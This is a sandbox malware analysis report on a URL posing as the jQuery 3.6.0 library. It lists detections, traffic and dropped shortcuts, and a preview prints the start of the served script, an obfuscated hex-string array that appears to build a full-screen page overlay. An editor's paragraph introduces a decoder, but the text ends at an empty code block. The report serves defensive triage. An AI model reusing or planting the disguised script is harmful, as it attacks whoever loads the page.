
Windows Analysis Report
http://abu.usaday.biz/jquery-3.6.0.min.js

Overview

General Information

Sample URL: http://abu.usaday.biz/jquery-3.6.0.min.js
Analysis ID: 1322536

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Stores files to the Windows start menu directory
Creates files inside the system directory

Classification

  • System is w10x64
  • chrome.exe (PID: 6504 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2040,i,1388585368886845847,6482679812835657815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 4312 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "http://abu.usaday.biz/jquery-3.6.0.min.js MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: http://abu.usaday.biz/jquery-3.6.0.min.js | Avira URL Cloud: detection malicious, Label: malware
Source: abu.usaday.biz | Virustotal: Detection: 7%
Source: http://abu.usaday.biz/jquery-3.6.0.min.js | Virustotal: Detection: 6%
Source: https://abu.usaday.biz/favicon.ico | Avira URL Cloud: Label: malware
Source: https://abu.usaday.biz/jquery-3.6.0.min.js | HTTP Parser: No favicon
Source: unknown | HTTPS traffic detected: 104.98.116.138:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown | DNS traffic detected: queries for: clients2.google.com
Source: global traffic | HTTP traffic detected:
  GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
  Host: clients2.google.com
  Connection: keep-alive
  X-Goog-Update-Interactivity: fg
  X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
  X-Goog-Update-Updater: chromecrx-117.0.5938.134
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /jquery-3.6.0.min.js HTTP/1.1
  Host: abu.usaday.biz
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Host: abu.usaday.biz
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://abu.usaday.biz/jquery-3.6.0.min.js
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=kT2HDdY9UAm6etl&MD=MFs5p6DS HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
  Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected:
  GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=kT2HDdY9UAm6etl&MD=MFs5p6DS HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
  Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 10 Oct 2023 03:16:14 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Cache-Control: max-age=14400
  CF-Cache-Status: MISS
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u9mxTix3ZJeEJl1m3ga2mkiabeNsZGF4WOpN8lPQs64Iu3E%2BSd%2BCKY9%2FChjT5hZ8PNITU8eUe2meCLRVub3mm%2BWJxmVUkgsGuKltOtOpbj9tUQdvM2x4uKtaOCrzYJRXwg%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 813bb413ec3c7c83-LAX
  alt-svc: h3=":443"; ma=86400
Source: unknown | HTTP traffic detected:
  POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
  Host: accounts.google.com
  Connection: keep-alive
  Content-Length: 1
  Origin: https://www.google.com
  Content-Type: application/x-www-form-urlencoded
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Cookie: 1P_JAR=2023-10-05-14; NID=511=OL3WgnA24QwPfMpspsItpZ2c_g7YXAAMilzUqiZdxG8z8Ka1c00AfG24ctRwvhPMrHVqO7oNbKVSwiOA0g2EzuMjPJIvQtOS7zZy99O8OkMoKSMKDFs-L1TjxHc_KVN5KBVb4BTfsPAzvlWsn_iACmkP3ulD50w_qpZ6JVqkr7w
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\chrome_BITS_6504_903654782
Source: classification engine | Classification label: mal72.win@17/8@12/7
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2040,i,1388585368886845847,6482679812835657815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "http://abu.usaday.biz/jquery-3.6.0.min.js
Source: Google Drive.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ATT&CK matrix by tactic (the count of matching signatures is given in parentheses where the report shows one):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows)
Persistence: Registry Run Keys / Startup Folder (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Process Injection (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading (11); Process Injection (1); Obfuscated Files or Information; Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (5); Ingress Tool Transfer (3)
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
Impact: Modify System Partition; Device Lockout; Delete Device Data

Source | Detection | Scanner | Label
http://abu.usaday.biz/jquery-3.6.0.min.js | 100% | Avira URL Cloud | malware
http://abu.usaday.biz/jquery-3.6.0.min.js | 7% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
fp2e7a.wpc.phicdn.net | 0% | Virustotal |
abu.usaday.biz | 8% | Virustotal |

Source | Detection | Scanner | Label
https://abu.usaday.biz/favicon.ico | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
a.nel.cloudflare.com | 35.190.80.1 | true | false | | high
accounts.google.com | 142.250.217.141 | true | false | | high
abu.usaday.biz | 172.67.148.211 | true | false | | unknown
www.google.com | 172.217.12.132 | true | false | | high
clients.l.google.com | 142.250.72.174 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.211.108 | true | false | | unknown
clients2.google.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://a.nel.cloudflare.com/report/v3?s=u9mxTix3ZJeEJl1m3ga2mkiabeNsZGF4WOpN8lPQs64Iu3E%2BSd%2BCKY9%2FChjT5hZ8PNITU8eUe2meCLRVub3mm%2BWJxmVUkgsGuKltOtOpbj9tUQdvM2x4uKtaOCrzYJRXwg%3D%3D | false | | high
https://abu.usaday.biz/favicon.ico | false | Avira URL Cloud: malware | unknown
https://abu.usaday.biz/jquery-3.6.0.min.js | false | | unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 | false | | high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.217.141 | accounts.google.com | United States | 15169 | GOOGLEUS | false
172.217.12.132 | www.google.com | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
172.67.148.211 | abu.usaday.biz | United States | 13335 | CLOUDFLARENETUS | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
142.250.72.174 | clients.l.google.com | United States | 15169 | GOOGLEUS | false

Private IP
192.168.2.3
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1322536
Start date and time: 2023-10-10 05:15:23 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 2m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: browseurl.jbs
Sample URL: http://abu.usaday.biz/jquery-3.6.0.min.js
Analysis system description: Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.win@17/8@12/7
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
  • Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 209.197.3.8, 192.229.211.108, 142.250.68.67, 34.104.35.123
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed; the report is missing behavior information
                      No simulations
                      No context
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 10 02:16:11 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2675
Entropy (8bit): 3.9792222409972267
Encrypted: false
SSDEEP: 48:8EdvTTvVnHGidAKZdA1kLehwiZUklqehXy+3:8M/VtIy
MD5: D292DFFA546FCF61DAA4371EF003C21E
SHA1: F33323CE23B16043A0DB886E180378ACD24DA736
SHA-256: 875B492F9685D392E06A2EF72552880FEEE9FF62671545FE9C0D12AEE278E1C8
SHA-512: 32A4529595C237695486958076E551A8E00CA9FA53C738C1D9A874AECB3C60C8D161BC4BD85865A6989B906F89C744C00E759284F435CA62E4400912BE9B480F
Malicious: false
Reputation: low
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 10 02:16:11 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2677
Entropy (8bit): 3.993035146443153
Encrypted: false
SSDEEP: 48:8NdvTTvVnHGidAKZdA1DLeh/iZUkAQkqeh4y+2:8v/Vx9QVy
MD5: E94583FE1ECD8F98ECFF507EB9000563
SHA1: E8057004CBA164BDDFD3EDC5C07EB6D8D6407DEB
SHA-256: 3F832301D8856DB2C19AF1CCD6AA425501D9145A1790C56E91EDA5FC7A70E720
SHA-512: 3ED746A15BC3002B8B5CD67EBB36A8A6D30CD851ADA8D43EC885B44CDF1D2921A5CF917ABE3162A8623E1D7743CC5D0C84E9756DE1F7CF0C034BDE4DD5A31939
Malicious: false
Reputation: low
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 13:13:28 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2691
Entropy (8bit): 4.004804305461457
Encrypted: false
SSDEEP: 48:8edvTTvCnHGidAKZdA14PLeh7sFiZUkmgqeh7sGy+BX:8a/CHn0y
MD5: 5789A73ED0845850F9ED5C8C94F21E44
SHA1: A73740FE759260F92B60DC394CF52B4E2DA8C814
SHA-256: C10A4A66EAD437D89FE72CF69819C66BD246E36A72604697669E18B137B9696D
SHA-512: E3764E571582CD6264D410931EC7F64DCC6A30C50ED0BE6AFEB676E40B23AFEEB4602775B21652F5A3AB74C3557EB8BC77902D4B8ED793CB388436BE08DDB803
Malicious: false
Reputation: low
                      Preview:L..................F.@.. ...$+.,.....k........v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.IJW......B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJW......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.VJW......M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.VJW.............................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.q....O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 10 02:16:11 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2679
                      Entropy (8bit):3.989919206923258
                      Encrypted:false
                      SSDEEP:48:8ldvTTvVnHGidAKZdA1mLehDiZUkwqehMy+R:83/VEey
                      MD5:724E9C4D9E305C769DA21A6D68CFAD88
                      SHA1:D7106E4DC2375B876228168ED899563A438B0780
                      SHA-256:485087EE5B32285F154575EC4E41C19BD34D795A222D4F703C8DD038040B598F
                      SHA-512:D11A4908B04BE38AB2EC10E7FDA12D8886FDFE27A92D9FBB12927C02AB5021162830BEB9C83CECA2DDA029D8246713A5DC06503B11D0BB2B4EAE329BFC1CBD6F
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,.....,..(.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.IJW......B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJW......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.VJW......M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.VJW.............................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VJW......O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 10 02:16:11 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2679
                      Entropy (8bit):3.980034117174271
                      Encrypted:false
                      SSDEEP:48:8hdvTTvVnHGidAKZdA1oLehBiZUk1W1qehyy+C:8D/VU9Sy
                      MD5:8BC4BAD54F705CCD2F15223BD18BA15F
                      SHA1:82EE081E5DFC9F468BEEE790E07B0B473EAC280F
                      SHA-256:7214D31119D63722FA57F2648A006B2B21D8356E737FA787CAA529DA7030E60F
                      SHA-512:B117739DB9530B43C72E085C0CFF33293A5BE2B1971B6A946BC5360C74A8F3F187A9D51296779F6F9B414F4FBB8BB0A6F0B6681B2F9E55AA6CFDBC432ED3F749
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,....=Z..(.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.IJW......B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJW......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.VJW......M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.VJW.............................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VJW......O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 10 02:16:11 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2681
                      Entropy (8bit):3.9936222401408714
                      Encrypted:false
                      SSDEEP:48:8EdvTTvVnHGidAKZdA1duTBLehOuTbbiZUk5OjqehOuTb0y+yT+:8M/VpT6TbxWOvTb0y7T
                      MD5:8EBBDEEC73024A42D65651A3A7C024B4
                      SHA1:772CF8A00E47A29BE86C0685F535FD23382D1509
                      SHA-256:B3BF7E2C0C918B6A743A731EB85C2D84899A5F76259B128A4220AB89EBB72A31
                      SHA-512:150B002238E2E7C2B80E955C838068879C53990C051F0E73828197A2FBA0FC31BF5AE62D428510F31F760505977F1643CD5F133CA78042826A40AF2E9CDE6E00
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,........(.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.IJW......B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJW......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.VJW......M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.VJW.............................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VJW......O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (2790), with no line terminators
                      Category:downloaded
                      Size (bytes):2790
                      Entropy (8bit):4.014199679075213
                      Encrypted:false
                      SSDEEP:48:8gSj5JOcKOuAbJ8Y8TekEzJYWYuBCDZGkME4B42RDQuqTqyDq5+fAMzTg:8gU5JBKO5bYErBOGk54i2RDQLuymcIKg
                      MD5:2E51882E7E71D0BA057E01A1AE6EB27F
                      SHA1:187D28C005CCA065C209EDF3B879ECBC716865EE
                      SHA-256:CDB8068B3F61457084FE0B1534D4B634969965A9B7CEA1DE8331D2A7F904868E
                      SHA-512:4E938DA7C2EE83DA2E5EAD45C6B92079572D658173534C0168A275E592F066CC85DDF25B070EE7668AB41407AAF64DB6A8BBD8F6C134E916360A8D174B1C03F5
                      Malicious:false
                      Reputation:low
                      URL:https://abu.usaday.biz/jquery-3.6.0.min.js
                      Preview:var _0x5c71=["\x63\x38\x32\x32\x63\x31\x62\x36\x33\x38\x35\x33\x65\x64\x32\x37\x33\x62\x38\x39\x36\x38\x37\x61\x63\x35\x30\x35\x66\x39\x66\x61","\x37\x33\x38\x61\x61\x38\x64\x33\x62\x63\x30\x32\x65\x62\x38\x37\x31\x32\x61\x63\x64\x30\x65\x62\x32\x63\x66\x36\x64\x66\x64\x35","\x32\x34\x31\x66\x65\x38\x61\x66\x31\x65\x30\x33\x38\x31\x31\x38\x63\x64\x38\x31\x37\x30\x34\x38\x61\x36\x35\x66\x38\x30\x33\x65","\x62\x61\x39\x62\x66\x30\x35\x36\x39\x33\x62\x39\x66\x61\x32\x30\x32\x64\x39\x32\x32\x64\x64\x34\x33\x61\x30\x38\x66\x32\x38\x31","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x63\x73\x73\x54\x65\x78\x74","\x73\x74\x79\x6C\x65","\x77\x69\x64\x74\x68\x3A\x31\x30\x30\x25\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x31\x30\x30\x25\x3B\x20\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x66\x69\x78\x65\x64\x3B\x20\x6C\x65\x66\x74\x3A\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x30\x70\x78\x3B\x20\x7A\x2D\x
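The Preview above shows that the file served as jquery-3.6.0.min.js opens with a hex-escaped string array named `_0x5c71` rather than the jQuery banner; at 2,790 bytes it is also far smaller than the genuine jQuery 3.6.0 minified build (about 89 KB). Obfuscators of the javascript-obfuscator family hoist every literal into such an array and replace each use with an index lookup, so recovering the array is the first static triage step. The decoder below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. `SAMPLE_SOURCE` is constructed from the visible Preview prefix, verbatim, with the cut-off final element closed as-is and not completed; the function names and the triage buckets are the editor's own choices.

```javascript
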